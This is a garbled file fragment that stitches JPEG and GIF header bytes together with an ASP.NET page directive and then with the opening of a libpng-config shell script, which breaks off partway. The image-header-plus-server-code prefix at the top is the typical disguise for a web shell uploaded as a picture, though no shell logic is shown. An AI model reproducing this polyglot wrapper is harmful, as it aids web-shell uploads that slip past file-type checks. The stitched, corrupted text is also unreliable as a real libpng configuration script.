ÿØÿà JFIF ÿÛ C $.' ",#(7),01444'9=82<.342ÿÛ C 2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %>
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
#! /bin/sh
# libpng-config
# provides configuration info for libpng.
# Copyright (C) 2002, 2004, 2006, 2007 Glenn Randers-Pehrson
# This code is released under the libpng license.
# For conditions of distribution and use, see the disclaimer
# and license in png.h
# Modeled after libxml-config.
version="1.6.48"
prefix="/usr"
exec_prefix="/usr"
# we disable that to make the -dev package Multi-Arch: same
libdir=
includedir="/usr/include/libpng16"
libs="-lpng16"
all_libs="-lpng16 -lz -lm"
I_opts="-I${includedir}"
L_opts=
R_opts=""
cppflags=""
ccopts=""
ldopts=""
usage()
{
cat <